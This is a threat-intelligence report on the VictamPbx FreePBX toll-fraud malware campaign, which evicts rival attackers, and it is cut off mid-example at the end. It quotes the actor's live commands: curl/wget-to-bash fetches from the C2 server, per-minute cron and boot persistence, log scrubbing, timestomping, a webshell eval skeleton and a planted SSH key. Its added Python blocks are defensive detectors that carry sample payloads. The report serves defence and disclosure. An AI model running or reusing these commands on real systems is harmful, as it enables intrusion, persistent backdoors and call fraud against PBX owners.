The FreePBX Turf War: How VoIP Threat Actors Are Fighting Over Your Phone System
Breakglass Intelligence | 2026-03-15 TLP: WHITE
TL;DR
Seventeen variants of the same FreePBX malware kit -- all named k.php, all approximately 19,499 bytes -- hit our GHOST honeypot sensors between March 14 and March 15, 2026. Each deploys a PHP webshell called VictamPbx for VoIP toll fraud. That part is not new. What is new: the latest variant (SHA256: 4e3ae67c...) contains a full Stage 2 payload that, before installing its own backdoors, systematically hunts and removes the implants of at least seven competing threat actors -- Juba VoIP, Nahda, Badr/b3d0r, nvd0rz, tchTowr, yokyok, and several unnamed groups. It deletes their user accounts, kills their cron jobs, greps webshell directories for rival signature strings and purges matching files, then disables the FreePBX endpoint module to seal the door behind it.
This is not just malware. It is territorial warfare. Multiple organized groups are fighting for exclusive control of the same pool of compromised VoIP phone systems, and VictamPbx is winning by being the most aggressive about evicting competitors.
Why VoIP Systems Are Worth Fighting Over
A compromised PBX is a money printer. The operator can route outbound calls through the victim's SIP trunks to premium-rate international numbers they control. The victim's telco bills them for the calls; the attacker collects revenue share from the premium-rate provider. This is International Revenue Share Fraud (IRSF), and a single hijacked PBX can generate tens of thousands of dollars in fraudulent charges in a weekend.
FreePBX, Elastix, Issabel, and Sangoma are open-source VoIP platforms deployed by hundreds of thousands of businesses worldwide. Many are internet-exposed with default configurations, unpatched admin panels, and the restapps REST API module enabled -- a module that provides unauthenticated remote code execution on vulnerable versions.
The result: a finite pool of exploitable targets and multiple criminal groups competing for the same victims. When one group compromises a PBX, another group often finds the same system later and has to decide what to do about the existing implants. VictamPbx's answer is scorched earth.
The Infection Chain
The VictamPbx kill chain is a four-stage operation. The entry point is the FreePBX restapps REST API, which allows remote code execution on unpatched systems.
Stage 0: k.php -- The Dropper
Despite the .php extension, this is a Bash script. The extension is deliberate -- it blends into FreePBX web directories full of legitimate PHP files and looks unremarkable in Apache access logs.
The dropper base64-decodes a PHP webshell and copies it to twelve or more filesystem paths:
/var/www/html/admin/views/ajax.php
/var/www/html/rest_phones/ajax.php
/var/www/html/admin/modules/core/ajax.php
/var/www/html/digium_phones/ajax.php
/var/www/html/admin/assets/js/config.php
/var/www/html/admin/assets/config.php
/var/www/html/admin/assets/ajax.php
/var/www/html/phones/ajax.php
/var/www/html/digium_phoness/ajax.php
/var/www/html/fpbxphones/ajax.php
/var/www/html/freepbxphones/ajax.php
/var/www/html/freepbx/ajax.php
It creates missing directories first (mkdir -p), ensuring the webshell deploys even on fresh installs with non-standard configurations. It then drops an .htaccess file with RewriteEngine rules to redirect requests to config.php, providing a fallback access path even if ajax.php filenames are blocked.
Anti-forensics run immediately. Timestamps on the webshell are set to match footer.php (a legitimate FreePBX file), making file-age detection useless:
touch -r /var/www/html/admin/themes/default/views/footer.php \
/var/www/html/admin/views/ajax.php
Apache logs are scrubbed to remove evidence of the restapps entry point:
sed -i '/restapps/d' /var/log/httpd/*
Finally, the dropper writes and executes /tmp/test.sh (Stage 3), which chains into Stage 2.
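The timestomp above leaves a forensic seam: `touch -r` copies the reference file's atime and mtime, but the kernel still updates ctime on that inode change, so a webshell whose mtime is identical to footer.php's while its ctime is months newer stands out. The following is an added detection example, not code from the report or the actor's toolkit; the directory layout mirrors the report's paths under a caller-supplied web root, and the sample tree is constructed in a temporary directory.

```python
"""Spot timestomped web files: mtime cloned from a reference file, ctime far newer.

Added example, not code from the report. `touch -r` copies a reference file's
atime and mtime, but the kernel still bumps ctime on that inode change, so a
PHP file whose mtime exactly equals footer.php's while its ctime is much later
is a strong timestomp indicator. Paths follow the report's layout under a
caller-supplied web root; the sample tree below is constructed in a temp dir.
"""
import os
import shutil
import tempfile
import time
from pathlib import Path

# The legitimate file the dropper copies timestamps from (relative to the web root).
REFERENCE = Path("admin/themes/default/views/footer.php")


def suspicious_mtime_clones(web_root: Path, reference_rel: Path = REFERENCE,
                            min_ctime_gap: float = 60.0) -> list[str]:
    """PHP files whose mtime equals the reference's to the nanosecond but whose
    ctime trails that mtime by at least `min_ctime_gap` seconds."""
    reference = (web_root / reference_rel).resolve()
    ref_mtime_ns = reference.stat().st_mtime_ns
    hits = []
    for path in web_root.rglob("*.php"):
        if path.resolve() == reference:
            continue
        st = path.stat()
        if st.st_mtime_ns == ref_mtime_ns and st.st_ctime - st.st_mtime >= min_ctime_gap:
            hits.append(path.relative_to(web_root).as_posix())
    return sorted(hits)


def build_sample_tree() -> Path:
    """Constructed fixture: an old footer.php, a fresh ajax.php timestomped to
    match it, and an untouched config.php with honest timestamps."""
    root = Path(tempfile.mkdtemp(prefix="pbx-webroot-"))
    footer = root / REFERENCE
    footer.parent.mkdir(parents=True)
    footer.write_text("<?php // legitimate theme footer ?>\n")
    old = time.time() - 400 * 86400            # footer pretends to be ~400 days old
    os.utime(footer, (old, old))

    shell = root / "admin/views/ajax.php"
    shell.parent.mkdir(parents=True)
    shell.write_text("<?php /* constructed stand-in for a webshell */ ?>\n")
    os.utime(shell, (old, old))                # same effect as `touch -r footer.php ajax.php`

    (root / "admin/config.php").write_text("<?php // untouched legitimate file ?>\n")
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    try:
        print(suspicious_mtime_clones(sample_root))   # ['admin/views/ajax.php']
    finally:
        shutil.rmtree(sample_root)
```

On a live host, point `suspicious_mtime_clones` at `/var/www/html`; the `min_ctime_gap` threshold exists because a legitimate package update rewrites files with mtime and ctime a fraction of a second apart, whereas a stomped file inherits an mtime that is months older than its ctime.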
Stage 1: ajax.php -- The Webshell
The webshell uses double base64 encoding interleaved with randomly generated C-style comments to break pattern matching:
/*nxWXUx1QVDLGG9flBG2QFYBU*/ eval(base64_decode(
/*KoB58L4pQuVnU5*/ "...payload..." /*dummy*/
));
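The comment interleaving only defeats matching on the literal token sequence; once the block comments and whitespace are stripped, the `eval(base64_decode(` wrapper is contiguous again and the payload can be unwrapped layer by layer. The following is an added detection example, not code from the report. The webshell body is a constructed sample following the shape quoted above, and its inner payload is a harmless stand-in, not the actor's code.

```python
"""Detect comment-interleaved, multi-layer base64 eval() webshells.

Added example, not code from the report. The webshell body below is a
constructed sample that follows the shape quoted above; its inner payload
is a harmless stand-in, not the actor's code.
"""
import base64
import binascii
import re

# Block comments the dropper interleaves between tokens so that literal
# signature matching on the eval / base64_decode / quote sequence fails.
C_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
# Applied after comment stripping and whitespace removal, so no \s* needed.
EVAL_B64 = re.compile(r"eval\(base64_decode\(['\"]([A-Za-z0-9+/=]+)['\"]")
SUSPICIOUS_CALLS = ("system(", "exec(", "shell_exec(", "passthru(", "eval(")

INNER_PAYLOAD = "<?php system($_POST['cmd']); ?>"  # constructed stand-in payload
DOUBLE_ENCODED = base64.b64encode(base64.b64encode(INNER_PAYLOAD.encode())).decode()
SAMPLE_WEBSHELL = (
    "<?php\n"
    "/*nxWXUx1QVDLGG9flBG2QFYBU*/ eval(base64_decode(\n"
    f'/*KoB58L4pQuVnU5*/ "{DOUBLE_ENCODED}" /*dummy*/\n'
    "));\n"
)


def naive_signature_hit(php_source: str) -> bool:
    """The literal string a simple grep would look for; the comments defeat it."""
    return 'eval(base64_decode("' in php_source


def normalize(php_source: str) -> str:
    """Strip block comments and all whitespace so the call sequence is contiguous."""
    return re.sub(r"\s+", "", C_COMMENT.sub("", php_source))


def peel_base64(blob: str, max_layers: int = 4) -> list[str]:
    """Decode base64 repeatedly, returning each layer that decoded to UTF-8 text.

    Stops when the data is no longer strictly valid base64 (validate=True
    rejects any non-alphabet byte), which separates the plaintext layer
    from the encoded layers above it.
    """
    layers = []
    current = blob
    for _ in range(max_layers):
        try:
            decoded = base64.b64decode(current, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            break
        layers.append(decoded)
        current = decoded
    return layers


def analyze(php_source: str) -> dict:
    """Report whether an eval(base64_decode(...)) wrapper exists, how many
    encoding layers it hides, and which dangerous calls the final layer makes."""
    result = {"eval_base64": False, "layers": 0, "calls": []}
    match = EVAL_B64.search(normalize(php_source))
    if not match:
        return result
    result["eval_base64"] = True
    layers = peel_base64(match.group(1))
    result["layers"] = len(layers)
    if layers:
        result["calls"] = [c for c in SUSPICIOUS_CALLS if c in layers[-1]]
    return result


if __name__ == "__main__":
    print("naive grep hit:", naive_signature_hit(SAMPLE_WEBSHELL))   # False
    print("normalized scan:", analyze(SAMPLE_WEBSHELL))
```

Running `analyze` over every `.php` file under the web root and alerting on `eval_base64` with a non-empty `calls` list catches this family regardless of the random comment text and the per-variant payload bytes, which is the property a signature needs here.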
Authentication is MD5-based. The submit button is labeled "VictamPbx" -- actor branding baked into the UI. Once authenticated, the operator gets:
- Full command execution via system()
- Elastix credential theft from the SQLite ACL database at /var/pubsevcas.wwp
- FreePBX admin session hijacking via paloSantoDB.class.php and paloSantoACL.class.php
- Asterisk call origination -- a CALL button that executes asterisk -rx "channel originate Local/00<number>@asterisk-outcalls" to route fraudulent calls through the victim's trunks
An HTML comment embedded in the webshell output contains an IP address -- a different operator IP in each variant, and a persistent OPSEC mistake. More on that later.
Stage 3: license.php -- The Chain Loader
Dropped to /var/www/html/admin/modules/freepbx_ha/license.php, this script fetches and executes Stage 2 from the C2:
curl -s http://45.234.176.202/new/c | bash
wget -qO- http://45.234.176.202/new/c | bash
Both curl and wget are tried for compatibility. This stage also sets up cron persistence and performs log cleanup.
Stage 2: /new/c -- The Turf War
This is where VictamPbx distinguishes itself. The 142-line Stage 2 script, actively served at http://45.234.176.202/new/c at the time of analysis, is as much about eliminating rivals as installing persistence.
The Turf War: Hunting Competitors
Stage 2 opens with a systematic purge of competing threat actors' artifacts. It has detailed knowledge of at least seven rival groups and their specific implant signatures.
Account Removal
The script removes FreePBX admin and OS user accounts belonging to known competitors:
| Removed Account | Associated Actor |
|---|---|
| bluej | Unknown group |
| nahda | Nahda (Arabic: "renaissance") |
| FreePBX_setup | Nahda |
| nvd0rz | Unknown |
| tchTowr | Unknown |
| watch* (wildcard) | Unknown (pattern match) |
| ampuser | Unknown |
| svc_freepbx | Unknown |
| freepbx_svc | Unknown |
| juba | Juba VoIP |
The Juba VoIP actor appears to be a significant rival. juba is removed as a system user, and the string JUBAVOIP is one of the webshell signatures targeted for deletion (see below). The Nahda actor (Arabic name suggesting a Middle Eastern group) and the nvd0rz/tchTowr handles suggest at least three distinct competing operations with different regional origins.
Webshell Signature Purge
The script searches all PHP files in FreePBX web directories for strings associated with rival webshells, deleting any file that matches:
| Signature String | Associated Actor |
|---|---|
| JUBAVOIP | Juba VoIP |
| APlXtygI | Unknown |
| hi56q50GYvdi4W | Unknown |
| Badr | Badr actor |
| b3d0r | Badr actor (variant handle) |
| pastebin | Generic stagers using Pastebin for payload hosting |
| yokyok | yokyok actor |
| bm2cjjnRXac1WW3KT7k6MKTR | Unknown |
This is not guesswork. These are specific artifact strings the VictamPbx operator has collected by studying their competitors' tooling -- likely by encountering it on shared victims. The inclusion of generic pastebin matching is particularly aggressive: it catches any rival who uses Pastebin for payload delivery, even if the specific actor is unknown.
Cron Job Cleanup
Competing cron-based backdoors are removed by deleting FreePBX cron_jobs database entries containing echo or base64 -- common patterns in cron-based dropper persistence but not in legitimate FreePBX cron entries:
# Remove competitor cron persistence from FreePBX database
# Targets entries containing echo/base64 (rival dropper signatures)
Module Disablement
After cleaning house, VictamPbx takes a defensive step: it disables the FreePBX endpoint manager module entirely.
chmod 000 /var/www/html/admin/modules/endpoint
fwconsole ma uninstall endpoint
This is calculated. The endpoint manager is a known attack vector that competitors use. By disabling it, VictamPbx blocks a rival's return path while maintaining its own access through the restapps module and planted webshells. It is locking the door and throwing away the key the competition used, while keeping its own key.
VictamPbx's Own Persistence Arsenal
After clearing the field of rivals, Stage 2 installs its own persistence -- and it is extensive. Five independent mechanisms ensure the operator maintains access even if individual components are discovered and removed.
Backdoor Accounts
FreePBX admin backdoor:
Username: emoadmin
Password: SHA1-hashed value (88a9480df9779df5ad07d5902007c12bd2e2c1a3)
Root-level OS accounts (uid=0, gid=0):
| Username | Password Hash | Notes |
|---|---|---|
| centos | $1$ZOZZOup2$OlkDAl.oeilmBftGHLJGC. | Blends with CentOS systems |
| admin | $1$ZOZZOup2$OlkDAl.oeilmBftGHLJGC. | Generic admin |
| support | $1$ZOZZOup2$OlkDAl.oeilmBftGHLJGC. | Masquerades as support account |
| issabel | $1$ZOZZOup2$OlkDAl.oeilmBftGHLJGC. | Blends with Issabel PBX |
| sangoma | $1$ZOZZOup2$OlkDAl.oeilmBftGHLJGC. | Mimics FreePBX vendor name |
| emo | $1$ZOZZOup2$OlkDAl.oeilmBftGHLJGC. | Actor branding |
| newfpbx | $1$faV63BKr$4jH3MqYYmrpM55P.AWD2U1 | Different hash |
| [random] | $1$faV63BKr$4jH3MqYYmrpM55P.AWD2U1 | 6-char random name |
Every one of these accounts has uid=0. The naming is deliberate -- centos, admin, support, issabel, and sangoma are all names a sysadmin might overlook during an audit because they look like they belong.
SSH Backdoor
An RSA public key is planted in ~/.ssh/authorized_keys for all user home directories:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCRFHF4cGkHU1LHTnjybgIZ9aqNvY1/jj8spnVzz2bE
zYP+g0KanELnJtIZUh9oD3OIU0U8PS48wkEJ44DIsO9bahok9EgCQ15kY0GmOXNcxeyVoBTxxw8cOPl7
HA2sMWUbloSYbL5o/eb5uaO8qAbB7D5tMwpPwsCvXnNFyz5aTsv8BBtm1u3j1ClHaMRvMgtwLt3aB/BE
zQaEJCrEm0G3G4/lb7UxgLc/Kv0UDOxHTrgvLTX199anKRbOraOlHc91mZtgdQJeQhtkoBDD9NQWSuCK
ho0I85IAuM9Yq5vM8psVyO2obTENUeKxOLSiRu8pwJcHkLzGRiB8yemVCyav5MHsqex+ATeZqxn5+Mhn
N6HoNYtPYeppwmRdoUTNUzUTBhUUjS1pmbSckGXzigFHUAqXYbyjpJN/McbzaXxv1EhHu4pSjEweXiT0
Aptp0oGeyWpLLFjLmxUpWLe1W1BKCY8xQhEp3d9FJSG1USlJMH7u/hvdjOmM4y7MaXNocsc= Sangoma
The key comment is "Sangoma" -- the parent company of FreePBX. Any administrator who sees this key might assume it was placed there by the vendor. It was not.
SSH is reconfigured to allow root login (PermitRootLogin yes), and iptables is updated to allow port 22.
Cron Persistence
Two cron jobs re-fetch and execute the dropper every minute:
*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/zen2; \
bash /var/lib/asterisk/bin/zen2
*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/devnull2; \
bash /var/lib/asterisk/bin/devnull2
The binary names zen2 and devnull2 are chosen to look innocuous in process listings. The per-minute schedule means even if the webshell is removed, the full infection chain re-executes within 60 seconds.
Login and Boot Persistence
# .bash_profile, .bashrc:
(setsid wget "http://45.234.176.202/new/k.php" -O /var/spool/asterisk/tmp/serv \
&& bash /var/spool/asterisk/tmp/serv) &
# /etc/rc.local:
(setsid wget "http://45.234.176.202/new/k.php" -O /var/spool/asterisk/tmp/serv \
&& bash /var/spool/asterisk/tmp/serv) &
Every interactive login and every system boot triggers a fresh download and execution of the dropper. Combined with cron, webshells in 12+ paths, and 8 root accounts with SSH keys, the persistence is near-bulletproof.
Infrastructure and Attribution
The Raza Telefonia Network
All primary C2 infrastructure sits in the 45.234.176.0/22 subnet, owned by AS267369 (MAFREDINE TELECOMUNICACOES EIRELI), a telecom ISP in Salvador, Bahia, Brazil. Three IPs within this range form the operational backbone:
45.234.176.0/22 (AS267369 -- Salvador, Brazil)
|
+-- 45.234.176.202 [PRIMARY C2]
| crm.razatelefonia.pro
| Apache 2.4.56 / Asterisk 13.35.0
| /new/k.php -- Stage 0 dropper
| /new/c -- Stage 2 full compromise
| /panel/ -- "Raza Telefonia" operator panel
|
+-- 45.234.176.67 [PLATFORM INFRASTRUCTURE]
| razatelefonia.pro / workchat.pro
| MySQL 5.7.44 / Redis (unauthenticated) / RabbitMQ
| Portainer 2.27.6 (Docker management)
| Postfix / FTP / IMAP / POP3
|
+-- 45.234.176.204 [SIP GATEWAY]
painel.razatelefonia.pro
SIP on :5060 / WebSocket on :7443
This is where stolen call routes terminate
The C2 itself runs Asterisk 13.35.0 on port 8089. This is a VoIP-native operation: the attackers are running their own PBX infrastructure to terminate fraudulent calls routed through victims. The /panel/ path serves a Portuguese-language login UI branded "Raza Telefonia" -- a management console for what appears to be a toll fraud operation running as a business.
The supporting infrastructure on .67 includes Portainer (Docker orchestration), RabbitMQ (message queuing), Redis, and MySQL -- the backend of an automated fraud platform, not a manual operation.
A Secondary C2 on AWS
A second IP, 3.89.108.204 (AWS us-east-1), appears as an embedded marker in Stage 2 webshells: ((/*3.89.108.204*/)). This likely serves as a secondary staging or tracking endpoint, providing infrastructure redundancy outside the Brazilian subnet.
The Operator IP Leak
Across 17 variants caught by GHOST, we extracted eight distinct operator IPs embedded as HTML comments in the webshell source code. Each variant bakes its operator's current egress IP into the output -- a persistent OPSEC mistake:
| Operator IP | ISP / Location |
|---|---|
| 85.195.233.39 | Init7/Fiber7, Winterthur, Switzerland |
| 67.242.60.82 | Charter/Spectrum, US East |
| 72.218.186.242 | Cox Cable, Hampton Roads, Virginia |
| 99.144.170.185 | AT&T Residential, Alabama |
| 73.12.191.36 | Comcast Residential, California |
| 69.92.177.15 | Unknown US residential |
| 162.205.106.30 | Houston, Texas |
| 170.52.1;0.141 | Embedded marker (malformed -- likely internal tracking) |
The Swiss IP (85.195.233.39, Init7) appears in the most variants and is likely a VPN egress. The US residential IPs (AT&T, Comcast, Cox, Spectrum) could represent the operator's actual home connections -- or they could be additional proxies. The pattern is consistent with a single operator generating per-batch variants of the toolkit, each time inadvertently stamping their current egress IP into the webshell HTML.
Actor Profile: "Emo"
The actor self-identifies through consistent branding:
- System user emo (uid=0) on every victim
- FreePBX admin account emoadmin
- Webshell submit button labeled "VictamPbx"
- C2 panel branded "Raza Telefonia"
The depp handle appears in related infrastructure (admin.depp.com.br, depp.razatelefonia.pro), possibly a secondary alias.
Campaign Scale
GHOST captured 17 distinct VictamPbx variants between March 14-15, 2026 alone. All share:
- Identical filename: k.php
- Near-identical file size: 19,491-19,499 bytes
- Same C2: 45.234.176.202
- Same deployment paths and persistence mechanisms
- Different webshell authentication hashes and operator IPs per variant
The earliest confirmed C2 activity dates to January 28, 2026 (URLScan.io). A sibling sample with sudo and persistence tags was observed in late January. The razatelefonia.pro domain's certificate transparency logs and the Stage 2 payload's last-modified date of November 25, 2025 suggest the campaign has been running for at least four months.
Detection rates vary wildly across variants: some show 0/72 on VirusTotal (brand new, undetected), while others reach 24/76 with labels like Linux.MulDrop.187 (Dr.Web), HEUR:Trojan-Downloader.Shell.Agent.bc (Kaspersky), and Linux/Agent.OG (ESET). The rapid variant generation appears designed to stay ahead of signature-based detection.
| SHA256 (truncated) | First Seen (UTC) | VT Score |
|---|---|---|
| 4e3ae67cf9bb... | 2026-03-15 02:34 | N/A |
| 9aab893007c7... | 2026-03-14 20:16 | 0/0 |
| c424cef8ade7... | 2026-03-14 19:59 | Quota |
| 4dd9d9953ffa... | 2026-03-15 03:15 | N/A |
| 8821b1819b59... | 2026-03-15 07:43 | N/A |
| 3b4c85d2e412... | 2026-03-15 08:16 | N/A |
| 07adbfa4138c... | 2026-03-14 03:33 | 24/76 |
| 0b6568e67e45... | 2026-03-14 05:16 | 19/76 |
| 0f335a8feef7... | 2026-03-15 12:08 | 0/72 |
| 751c9590219f... | 2026-03-14 02:44 | 23/76 |
| 82aaa56441fc... | 2026-03-14 20:32 | N/A |
| 94f0212ea304... | 2026-03-15 07:41 | N/A |
| a948603c6a98... | 2026-03-14 21:44 | N/A |
| d05fecfdf187... | 2026-03-14 08:50 | 18/76 |
| d416f76290f5... | 2026-03-15 15:45 | N/A |
| ddad63744f93... | N/A | N/A |
| 3c5dac409eb2... | 2026-03-15 09:16 | N/A |
The Bigger Picture: Who Else Is in This Fight?
The competitor removal list in Stage 2 is essentially an intelligence report on the FreePBX threat landscape. Here is what we can infer about each group:
Juba VoIP -- Uses the system user juba and the webshell signature JUBAVOIP. Previously documented FreePBX-targeting actor. VictamPbx treats them as a primary rival, targeting both their user accounts and webshell files.
Nahda -- Arabic for "renaissance." Uses nahda and FreePBX_setup as user accounts. The Arabic name and naming conventions suggest a Middle Eastern origin. Operating in the same exploit space as the Brazilian VictamPbx group.
Badr/b3d0r -- "Badr" is an Arabic name. Uses both Badr and b3d0r as webshell signature strings, suggesting either two naming conventions for the same tool or a variant/fork. Likely the same actor or closely related to the Nahda group based on naming patterns.
yokyok -- Uses yokyok as a webshell signature. No further attribution available.
nvd0rz / tchTowr -- Hacker-style handles used as OS usernames on compromised PBXes. No further attribution.
Generic stagers -- The pastebin signature catch-all targets any actor using Pastebin for payload delivery, a common technique among lower-sophistication operators.
The ecosystem picture is striking: Brazilian VoIP fraud operators, Arabic-named groups (likely Middle Eastern), and various unattributed actors are all independently discovering, exploiting, and fighting over the same internet-exposed FreePBX installations worldwide. VictamPbx's approach -- total competitor eviction followed by redundant persistence -- is the most operationally mature.
Indicators of Compromise
File Hashes (Stage 0 Dropper)
| SHA256 | MD5 |
|---|---|
| 4e3ae67cf9bbce30e3ada000d1b03b58d503bc9b55c360a1fb34445915f364ab | 61e26bf2ad8eb5bf8e222852603824fb |
| 9aab893007c7dc97f98539b4a468bd978a6db7dff17a28fa9173e42252e8be55 | 6441aaa80cd62852eeb419c32ceb2fac |
| c424cef8ade79dab30ad4e6b688ac8bb7c5099ebea863e072d7a745db0b58e88 | 5e4c2751374eac2e48b85eaa34d4f3ab |
| 4dd9d9953ffac418546a28e23d52ccc8c92d863f0495c8980070457088f94297 | 7367d0e845d84727026a9c4170377917 |
| 8821b1819b5923e403f74dc10ec5a5c8c747ac03ad69f295bbfd6e8a6db86b58 | b79ab227419f86206847456ebdef8adb |
| 3b4c85d2e41273f33e8d6aff06ddf4b75a242a85d65ecd6207b321c9fd8722b5 | 5ca6709547122f51ecea48565e506e76 |
| 07adbfa4138c9afc8a974c815eeb17f3d6ef9479881bdbbcba4439d26d96bfd0 | 34deee0d6adb320910d583325e844342 |
| 0b6568e67e4545d2ed31b91a09fd8768d8241321c13f9acc06f38ff1a3f91f53 | 057a4d214929df3aad6b5ce79f3e4cd9 |
| 0f335a8feef756b240a6290108c74c69be1c8caae34725c5c66ef8066276310e | 2d3d79cad563f00dae9330bc5425bc4b |
| 751c9590219f90c83abcd37d32f8c3c24af2b634d83ed8f55f800d38e8a00c7f | 9f29901cb5d351c47726dcb59941770f |
| 82aaa56441fcb4ca4495c0f2e03eb8fe44df801abeb0aa0d4341d176fbd799ec | e8b718d265aae790dfc6b8e0c3ac0209 |
| 94f0212ea3040dd579837c12f2dd03de4424f5f9648f4af95505930b8961e200 | b664e5cba4e5d75feb04e071fc54ba7b |
| a948603c6a98efe282053a11422765c2771444be9aa2c90d6c5447744aff0985 | dc99867f12cb56f2213f39c55416545a |
| d05fecfdf187e28b21ac5e5df5659f10a5e5a23eeb638440ca93789c721a9d5a | bf93b64f89338ae6e1f345d5fdf75f85 |
| d416f76290f56c503d16f8db41a5eb6c6702495b1397a5b431eb0a089582321e | f6be9053fc562c6d5c58487178c09bcc |
| ddad63744f93537d16b00da6612fcde0a33e71818429096e83a7bbffe7ae6f38 | f3bf285ca4634797fb63b05b9cb8dc23 |
| 3c5dac409eb2cd9bd6019866c895d31b687cef053df4e767080b15d0487b0a2f | b345f289e4ca2a61dbd894cfaffa45c8 |
Network Indicators
| IP | Role | ASN / Location |
|---|---|---|
| 45.234.176.202 | Primary C2 / payload host | AS267369, Salvador, Brazil |
| 45.234.176.67 | Platform infrastructure (Docker/Redis/MQ) | AS267369, Salvador, Brazil |
| 45.234.176.204 | SIP termination gateway | AS267369, Salvador, Brazil |
| 3.89.108.204 | Secondary C2 / tracking marker | AWS us-east-1 |
Domains
| Domain | Role |
|---|---|
| crm.razatelefonia.pro | Primary C2 hostname |
| razatelefonia.pro | Apex domain |
| painel.razatelefonia.pro | SIP gateway panel |
| depp.razatelefonia.pro | Related infrastructure |
| megabahia.razatelefonia.pro | Related infrastructure |
| mail.razatelefonia.pro | Mail server |
| oratotext.razatelefonia.pro | Related infrastructure |
| workchat.pro | Communication platform |
| cadastro.workchat.pro | Registration portal |
| admin.depp.com.br | Admin panel |
URLs
| URL | Description |
|---|---|
| http://45.234.176.202/new/k.php | Stage 0 dropper |
| http://45.234.176.202/new/c | Stage 2 full compromise script |
| http://45.234.176.202/panel/ | Operator campaign panel |
Webshell Authentication Hashes
| MD5 Hash | Webshell Variant |
|---|---|
| 81087680ab58db407450771e3515e09a | Stage 1 ("VictamPbx" button) |
| d6e08cf66c4e2c48bd74db31cf697615 | Stage 2 ("Ask" button) |
| 14fb2b803eecb167bff68fe150c3f0fa | Variant |
| 66b68782ed9c39c5b69e5813d9c170ce | Variant |
SSH Backdoor Key Fingerprint
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCRFHF4cGkHU1LHTnjybgIZ...Sangoma
Key comment: Sangoma (masquerades as vendor key)
Filesystem Paths to Check
/var/www/html/admin/views/ajax.php
/var/www/html/admin/views/.htaccess
/var/www/html/rest_phones/ajax.php
/var/www/html/admin/modules/core/ajax.php
/var/www/html/admin/assets/js/config.php
/var/www/html/admin/assets/config.php
/var/www/html/admin/modules/freepbx_ha/license.php
/var/www/html/ajax.php
/var/www/html/h.php
/var/lib/asterisk/bin/zen2
/var/lib/asterisk/bin/devnull
/var/lib/asterisk/bin/devnull2
/var/lib/asterisk/bin/devnull23
/var/spool/asterisk/tmp/serv
Backdoor Account Names to Audit
emoadmin (FreePBX), centos, admin, support, issabel, sangoma, emo, newfpbx
sugarmaint, spamfilter, asteriskuser, supports, freepbxuser, supermaint
MITRE ATT&CK Mapping
| Technique | ID | Implementation |
|---|---|---|
| Exploit Public-Facing Application | T1190 | FreePBX restapps REST API RCE |
| Web Shell | T1505.003 | ajax.php deployed to 12+ paths |
| Unix Shell | T1059.004 | All stages are Bash scripts |
| Cron | T1053.003 | Per-minute dropper re-execution |
| Create Local Account | T1136.001 | 8 root-level accounts + FreePBX admin |
| SSH Authorized Keys | T1098.004 | RSA key planted in all home dirs |
| Clear System Logs | T1070.002 | sed removes restapps from Apache logs |
| Timestomp | T1070.006 | Webshell timestamps forged to match footer.php |
| Match Legitimate Name | T1036.005 | Accounts named centos/sangoma, key labeled "Sangoma" |
| Ingress Tool Transfer | T1105 | wget/curl fetch stages from C2 |
| Valid Accounts | T1078 | emoadmin provides persistent FreePBX access |
| Disable or Modify Tools | T1562.001 | FreePBX endpoint module disabled |
| Resource Hijacking | T1496 | Victim SIP trunks used for toll fraud |
| Credentials from Password Stores | T1555 | Elastix SQLite ACL database harvested |
Detection and Response
If you run FreePBX, Elastix, Issabel, or any Asterisk-based PBX:
- Check for uid=0 accounts other than root in /etc/passwd. Look for: centos, admin, support, issabel, sangoma, emo, newfpbx.
- Audit all authorized_keys files for the "Sangoma" SSH key.
- Search crontabs for entries containing 45.234.176.202, zen2, devnull, or k.php.
- Scan web directories for ajax.php in non-standard locations, particularly in phone provisioning paths.
- Block the entire 45.234.176.0/22 subnet at the firewall. Block 3.89.108.204.
- Disable the restapps module if you are not actively using it: fwconsole ma disable restapps.
- Review Asterisk CDRs for unauthorized outbound calls to international premium-rate numbers.
- Check .bash_profile, .bashrc, and /etc/rc.local for wget commands fetching from external IPs.
The per-minute cron persistence means partial cleanup is ineffective. If you find any of these indicators, assume full compromise and rebuild.
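The host-side checks in the list above can be scripted so they run the same way on every PBX in an estate. The following is an added example, not the report's own tooling. Each check takes file contents (or a directory root) rather than reading fixed system paths, so it runs against live files or, as here, against constructed fixtures; the indicator values (C2 address, account names, webshell paths, SSH key comment) are the report's, while the sample /etc/passwd, authorized_keys, crontab and rc.local text is constructed.

```python
"""Audit a PBX host for the indicators listed under Detection and Response.

Added example, not the report's tooling. Indicator values come from the
report; all sample inputs below are constructed fixtures.
"""
import re
import tempfile
from pathlib import Path

C2_IP = "45.234.176.202"
BACKDOOR_NAMES = {"centos", "admin", "support", "issabel", "sangoma", "emo", "newfpbx"}
CRON_MARKERS = (C2_IP, "zen2", "devnull", "k.php")
PLANTED_KEY_COMMENT = "Sangoma"
WEBSHELL_PATHS = [
    "admin/views/ajax.php", "admin/views/.htaccess", "rest_phones/ajax.php",
    "admin/modules/core/ajax.php", "admin/assets/js/config.php",
    "admin/assets/config.php", "admin/modules/freepbx_ha/license.php",
]
# wget/curl pulling from a bare IPv4 address, as in the planted .bashrc/rc.local lines.
EXTERNAL_FETCH = re.compile(r"\b(?:wget|curl)\b[^\n]*?https?://(\d{1,3}(?:\.\d{1,3}){3})")

# Constructed fixtures: one clean and one planted entry per source.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
asterisk:x:995:992::/var/lib/asterisk:/sbin/nologin
support:x:0:0::/home/support:/bin/bash
sangoma:x:0:0::/home/sangoma:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
"""
SAMPLE_AUTH_KEYS = """ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedOpsKey0000000000000000000 ops@example
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCRFHF4cGkHU1LHTnjybgIZ...TRUNCATED Sangoma
"""
SAMPLE_CRONTAB = """# nightly module signature refresh (legitimate)
0 3 * * * /usr/sbin/fwconsole ma refreshsignatures
*/1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/zen2; bash /var/lib/asterisk/bin/zen2
"""
SAMPLE_RC_LOCAL = """#!/bin/bash
touch /var/lock/subsys/local
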